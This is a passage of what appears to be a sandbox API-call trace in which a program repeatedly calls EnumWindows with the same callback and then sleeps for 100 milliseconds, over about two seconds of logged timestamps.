(lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.424] Sleep (dwMilliseconds=0x64) [0257.426] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.426] Sleep (dwMilliseconds=0x64) [0257.429] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.430] Sleep (dwMilliseconds=0x64) [0257.432] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.432] Sleep (dwMilliseconds=0x64) [0257.434] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.434] Sleep (dwMilliseconds=0x64) [0257.436] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.436] Sleep (dwMilliseconds=0x64) [0257.443] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.443] Sleep (dwMilliseconds=0x64) [0257.448] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.448] Sleep (dwMilliseconds=0x64) [0257.450] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.450] Sleep (dwMilliseconds=0x64) [0257.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.455] Sleep (dwMilliseconds=0x64) [0257.493] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.493] Sleep (dwMilliseconds=0x64) [0257.530] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.530] Sleep (dwMilliseconds=0x64) [0257.537] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.537] Sleep (dwMilliseconds=0x64) [0257.541] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.542] Sleep (dwMilliseconds=0x64) [0257.543] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.543] Sleep (dwMilliseconds=0x64) [0257.546] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.547] Sleep (dwMilliseconds=0x64) [0257.549] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.550] Sleep (dwMilliseconds=0x64) [0257.554] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.555] Sleep (dwMilliseconds=0x64) [0257.557] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.557] Sleep (dwMilliseconds=0x64) [0257.560] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.560] Sleep (dwMilliseconds=0x64) [0257.562] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.562] Sleep (dwMilliseconds=0x64) [0257.569] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.569] Sleep (dwMilliseconds=0x64) [0257.572] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.572] Sleep (dwMilliseconds=0x64) [0257.574] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.575] Sleep (dwMilliseconds=0x64) [0257.578] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.578] Sleep (dwMilliseconds=0x64) [0257.583] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.584] Sleep (dwMilliseconds=0x64) [0257.588] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.588] Sleep (dwMilliseconds=0x64) [0257.590] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.590] Sleep (dwMilliseconds=0x64) [0257.593] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.593] Sleep (dwMilliseconds=0x64) [0257.596] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.596] Sleep (dwMilliseconds=0x64) [0257.600] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.601] Sleep (dwMilliseconds=0x64) [0257.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.604] Sleep (dwMilliseconds=0x64) [0257.606] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.606] Sleep (dwMilliseconds=0x64) [0257.612] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.613] Sleep (dwMilliseconds=0x64) [0257.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.614] Sleep (dwMilliseconds=0x64) [0257.618] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.619] Sleep (dwMilliseconds=0x64) [0257.621] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.621] Sleep (dwMilliseconds=0x64) [0257.623] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.623] Sleep (dwMilliseconds=0x64) [0257.629] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.630] Sleep (dwMilliseconds=0x64) [0257.632] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.632] Sleep (dwMilliseconds=0x64) [0257.634] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.635] Sleep (dwMilliseconds=0x64) [0257.637] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.637] Sleep (dwMilliseconds=0x64) [0257.675] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.675] Sleep (dwMilliseconds=0x64) [0257.713] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.713] Sleep (dwMilliseconds=0x64) [0257.731] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.732] Sleep (dwMilliseconds=0x64) [0257.736] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.736] Sleep (dwMilliseconds=0x64) [0257.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.740] Sleep (dwMilliseconds=0x64) [0257.742] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.742] Sleep (dwMilliseconds=0x64) [0257.744] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.745] Sleep (dwMilliseconds=0x64) [0257.749] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.749] Sleep (dwMilliseconds=0x64) [0257.752] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.752] Sleep (dwMilliseconds=0x64) [0257.754] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.754] Sleep (dwMilliseconds=0x64) [0257.757] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.757] Sleep (dwMilliseconds=0x64) [0257.761] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.761] Sleep (dwMilliseconds=0x64) [0257.764] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.764] Sleep (dwMilliseconds=0x64) [0257.769] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.769] Sleep (dwMilliseconds=0x64) [0257.771] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.772] Sleep (dwMilliseconds=0x64) [0257.774] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.774] Sleep (dwMilliseconds=0x64) [0257.779] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.779] Sleep (dwMilliseconds=0x64) [0257.782] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.782] Sleep (dwMilliseconds=0x64) [0257.785] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.786] Sleep (dwMilliseconds=0x64) [0257.789] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.789] Sleep (dwMilliseconds=0x64) [0257.795] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.797] Sleep (dwMilliseconds=0x64) [0257.801] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.801] Sleep (dwMilliseconds=0x64) [0257.804] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.804] Sleep (dwMilliseconds=0x64) [0257.807] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.807] Sleep (dwMilliseconds=0x64) [0257.809] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.809] Sleep (dwMilliseconds=0x64) [0257.812] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.812] Sleep (dwMilliseconds=0x64) [0257.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.815] Sleep (dwMilliseconds=0x64) [0257.817] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.817] Sleep (dwMilliseconds=0x64) [0257.821] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.822] Sleep (dwMilliseconds=0x64) [0257.824] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.825] Sleep (dwMilliseconds=0x64) [0257.867] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.867] Sleep (dwMilliseconds=0x64) [0257.906] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.906] Sleep (dwMilliseconds=0x64) [0257.931] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.931] Sleep (dwMilliseconds=0x64) [0257.934] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.935] Sleep (dwMilliseconds=0x64) [0257.938] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.938] Sleep (dwMilliseconds=0x64) [0257.940] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.940] Sleep (dwMilliseconds=0x64) [0257.942] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.943] Sleep (dwMilliseconds=0x64) [0257.945] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.945] Sleep (dwMilliseconds=0x64) [0257.954] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.954] Sleep (dwMilliseconds=0x64) [0257.959] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.959] Sleep (dwMilliseconds=0x64) [0257.970] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.970] Sleep (dwMilliseconds=0x64) [0257.977] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.977] Sleep (dwMilliseconds=0x64) [0257.982] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.982] Sleep (dwMilliseconds=0x64) [0258.005] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.005] Sleep (dwMilliseconds=0x64) [0258.011] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.011] Sleep (dwMilliseconds=0x64) [0258.013] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.014] Sleep (dwMilliseconds=0x64) [0258.018] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.018] Sleep (dwMilliseconds=0x64) [0258.022] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.022] Sleep (dwMilliseconds=0x64) [0258.025] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.025] Sleep (dwMilliseconds=0x64) [0258.027] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.027] Sleep (dwMilliseconds=0x64) [0258.034] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.035] Sleep (dwMilliseconds=0x64) [0258.083] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.084] Sleep (dwMilliseconds=0x64) [0258.145] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.145] Sleep (dwMilliseconds=0x64) [0258.236] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.237] Sleep (dwMilliseconds=0x64) [0258.239] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.239] Sleep (dwMilliseconds=0x64) [0258.243] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.243] Sleep (dwMilliseconds=0x64) [0258.251] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.252] Sleep (dwMilliseconds=0x64) [0258.255] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.255] Sleep (dwMilliseconds=0x64) [0258.259] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.260] Sleep (dwMilliseconds=0x64) [0258.262] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.262] Sleep (dwMilliseconds=0x64) [0258.265] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.265] Sleep (dwMilliseconds=0x64) [0258.269] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.269] Sleep (dwMilliseconds=0x64) [0258.271] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.272] Sleep (dwMilliseconds=0x64) [0258.274] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.274] Sleep (dwMilliseconds=0x64) [0258.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.278] Sleep (dwMilliseconds=0x64) [0258.279] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.280] Sleep (dwMilliseconds=0x64) [0258.287] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.287] Sleep (dwMilliseconds=0x64) [0258.290] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.291] Sleep (dwMilliseconds=0x64) [0258.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.297] Sleep (dwMilliseconds=0x64) [0258.299] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.300] Sleep (dwMilliseconds=0x64) [0258.303] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.303] Sleep (dwMilliseconds=0x64) [0258.309] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.309] Sleep (dwMilliseconds=0x64) [0258.313] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.314] Sleep (dwMilliseconds=0x64) [0258.316] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.317] Sleep (dwMilliseconds=0x64) [0258.320] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.320] Sleep (dwMilliseconds=0x64) [0258.326] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.326] Sleep (dwMilliseconds=0x64) [0258.328] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.328] Sleep (dwMilliseconds=0x64) [0258.334] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.334] Sleep (dwMilliseconds=0x64) [0258.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.374] Sleep (dwMilliseconds=0x64) [0258.416] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.416] Sleep (dwMilliseconds=0x64) [0258.449] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.450] Sleep (dwMilliseconds=0x64) [0258.458] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.458] Sleep (dwMilliseconds=0x64) [0258.461] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.461] Sleep (dwMilliseconds=0x64) [0258.468] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.471] Sleep (dwMilliseconds=0x64) [0258.475] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.476] Sleep (dwMilliseconds=0x64) [0258.481] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.481] Sleep (dwMilliseconds=0x64) [0258.484] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.484] Sleep (dwMilliseconds=0x64) [0258.487] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.487] Sleep (dwMilliseconds=0x64) [0258.493] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.493] Sleep (dwMilliseconds=0x64) [0258.496] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.496] Sleep (dwMilliseconds=0x64) [0258.500] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.500] Sleep (dwMilliseconds=0x64) [0258.502] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.503] Sleep (dwMilliseconds=0x64) [0258.510] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.511] Sleep (dwMilliseconds=0x64) [0258.513] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.513] Sleep (dwMilliseconds=0x64) [0258.516] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.516] Sleep (dwMilliseconds=0x64) [0258.521] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.521] Sleep (dwMilliseconds=0x64) [0258.524] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.524] Sleep (dwMilliseconds=0x64) [0258.526] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.526] Sleep (dwMilliseconds=0x64) [0258.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.532] Sleep (dwMilliseconds=0x64) [0258.533] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.534] Sleep (dwMilliseconds=0x64) [0258.537] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.537] Sleep (dwMilliseconds=0x64) [0258.539] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.539] Sleep (dwMilliseconds=0x64) [0258.541] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.542] Sleep (dwMilliseconds=0x64) [0258.549] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.549] Sleep (dwMilliseconds=0x64) [0258.588] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.589] Sleep (dwMilliseconds=0x64) [0258.628] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.628] Sleep (dwMilliseconds=0x64) [0258.661] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.661] Sleep (dwMilliseconds=0x64) [0258.667] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.668] Sleep (dwMilliseconds=0x64) [0258.672] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.672] Sleep (dwMilliseconds=0x64) [0258.674] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.675] Sleep (dwMilliseconds=0x64) [0258.681] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.681] Sleep (dwMilliseconds=0x64) [0258.683] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.683] Sleep (dwMilliseconds=0x64) [0258.688] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.688] Sleep (dwMilliseconds=0x64) [0258.691] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.691] Sleep (dwMilliseconds=0x64) [0258.697] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.698] Sleep (dwMilliseconds=0x64) [0258.700] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.700] Sleep (dwMilliseconds=0x64) [0258.704] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.705] Sleep (dwMilliseconds=0x64) [0258.710] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.710] Sleep (dwMilliseconds=0x64) [0258.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.712] Sleep (dwMilliseconds=0x64) [0258.714] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.715] Sleep (dwMilliseconds=0x64) [0258.717] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.718] Sleep (dwMilliseconds=0x64) [0258.720] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.721] Sleep (dwMilliseconds=0x64) [0258.726] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.726] Sleep (dwMilliseconds=0x64) [0258.728] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.728] Sleep (dwMilliseconds=0x64) [0258.731] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.732] Sleep (dwMilliseconds=0x64) [0258.742] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.742] Sleep (dwMilliseconds=0x64) [0258.745] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.746] Sleep (dwMilliseconds=0x64) [0258.749] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.749] Sleep (dwMilliseconds=0x64) [0258.751] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.751] Sleep (dwMilliseconds=0x64) [0258.753] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.753] Sleep (dwMilliseconds=0x64) [0258.755] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.756] Sleep (dwMilliseconds=0x64) [0258.758] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.759] Sleep (dwMilliseconds=0x64) [0258.801] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.802] Sleep (dwMilliseconds=0x64) [0258.840] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.841] Sleep (dwMilliseconds=0x64) [0258.872] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.873] Sleep (dwMilliseconds=0x64) [0258.876] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.876] Sleep (dwMilliseconds=0x64) [0258.881] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.882] Sleep (dwMilliseconds=0x64) [0258.887] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.888] Sleep (dwMilliseconds=0x64) [0258.889] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.890] Sleep (dwMilliseconds=0x64) [0258.892] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.892] Sleep (dwMilliseconds=0x64) [0258.896] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.897] Sleep (dwMilliseconds=0x64) [0258.899] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.899] Sleep (dwMilliseconds=0x64) [0258.901] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.901] Sleep (dwMilliseconds=0x64) [0258.907] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.907] Sleep (dwMilliseconds=0x64) [0258.911] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.912] Sleep (dwMilliseconds=0x64) [0258.914] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.914] Sleep (dwMilliseconds=0x64) [0258.916] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.916] Sleep (dwMilliseconds=0x64) [0258.919] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.919] Sleep (dwMilliseconds=0x64) [0258.928] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.928] Sleep (dwMilliseconds=0x64) [0258.930] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.930] Sleep (dwMilliseconds=0x64) [0258.932] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.932] Sleep (dwMilliseconds=0x64) [0258.934] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.934] Sleep (dwMilliseconds=0x64) [0258.936] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.937] Sleep (dwMilliseconds=0x64) [0258.939] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.939] Sleep (dwMilliseconds=0x64) [0258.943] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.943] Sleep (dwMilliseconds=0x64) [0258.948] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.948] Sleep (dwMilliseconds=0x64) [0258.950] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.950] Sleep (dwMilliseconds=0x64) [0258.952] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.953] Sleep (dwMilliseconds=0x64) [0258.955] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.955] Sleep (dwMilliseconds=0x64) [0258.960] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.960] Sleep (dwMilliseconds=0x64) [0258.964] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.964] Sleep (dwMilliseconds=0x64) [0258.966] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.967] Sleep (dwMilliseconds=0x64) [0258.969] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.969] Sleep (dwMilliseconds=0x64) [0258.971] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0258.971] Sleep (dwMilliseconds=0x64) [0259.010] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.010] Sleep (dwMilliseconds=0x64) [0259.062] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.063] Sleep (dwMilliseconds=0x64) [0259.096] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.114] Sleep (dwMilliseconds=0x64) [0259.121] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.121] Sleep (dwMilliseconds=0x64) [0259.124] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.124] Sleep (dwMilliseconds=0x64) [0259.128] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.128] Sleep (dwMilliseconds=0x64) [0259.132] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.132] Sleep (dwMilliseconds=0x64) [0259.134] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.135] Sleep (dwMilliseconds=0x64) [0259.141] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.141] Sleep (dwMilliseconds=0x64) [0259.143] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.143] Sleep (dwMilliseconds=0x64) [0259.145] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.146] Sleep (dwMilliseconds=0x64) [0259.176] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.177] Sleep (dwMilliseconds=0x64) [0259.180] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.180] Sleep (dwMilliseconds=0x64) [0259.182] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.182] Sleep (dwMilliseconds=0x64) [0259.189] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.190] Sleep (dwMilliseconds=0x64) [0259.288] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.288] Sleep (dwMilliseconds=0x64) [0259.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.333] Sleep (dwMilliseconds=0x64) [0259.435] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.435] Sleep (dwMilliseconds=0x64) [0259.466] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.467] Sleep (dwMilliseconds=0x64) [0259.477] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.477] Sleep (dwMilliseconds=0x64) [0259.516] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.517] Sleep (dwMilliseconds=0x64) [0259.556] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.557] Sleep (dwMilliseconds=0x64) [0259.591] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.591] Sleep (dwMilliseconds=0x64) [0259.613] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.613] Sleep (dwMilliseconds=0x64) [0259.652] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.653] Sleep (dwMilliseconds=0x64) [0259.692] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.692] Sleep (dwMilliseconds=0x64) [0259.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.705] Sleep (dwMilliseconds=0x64) [0259.709] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.710] Sleep (dwMilliseconds=0x64) [0259.739] EnumWindows (lpEnumFunc=0x2843dc0, 